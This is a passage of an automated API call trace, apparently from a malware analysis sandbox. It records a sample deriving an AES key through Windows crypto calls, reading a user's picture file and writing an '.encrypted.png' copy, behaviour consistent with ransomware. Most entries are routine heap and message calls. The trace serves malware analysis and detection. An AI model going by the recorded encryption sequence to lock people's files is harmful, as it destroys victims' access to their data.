0x7da368 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0039.308] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.308] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0039.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0039.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0039.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0039.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0039.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0039.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0039.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.309] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.309] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0039.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0039.310] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.310] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0039.310] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.311] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.311] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0039.311] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.311] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.311] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.311] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.311] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.311] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0039.311] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.311] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0039.311] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.311] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.311] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.311] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0039.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0039.311] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.311] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.311] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0039.312] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.312] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0039.312] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.312] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.312] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.312] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.312] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0039.312] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.312] CryptDestroyHash (hHash=0x7c2240) returned 1 [0039.312] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.312] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.312] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0039.312] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0039.312] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.312] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\afpzd.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.313] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.313] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0039.313] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.313] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0039.313] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.313] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\AfpZd.encrypted.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\afpzd.encrypted.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.313] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.313] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0039.313] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.313] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.314] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0039.314] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x5fbe, lpOverlapped=0x0) returned 1 [0039.315] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0039.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.315] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.315] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.315] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.315] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0039.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.315] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.315] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.315] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0039.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0039.315] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0039.315] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.316] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0039.316] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.316] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.316] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0039.316] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0039.316] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.316] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da278, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da278*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0039.316] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.316] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0039.316] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.316] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.316] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.316] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.316] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.316] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.316] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0039.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.316] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.316] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.316] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.317] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.317] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0039.317] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.317] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0039.317] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.317] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.317] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.317] HeapFree 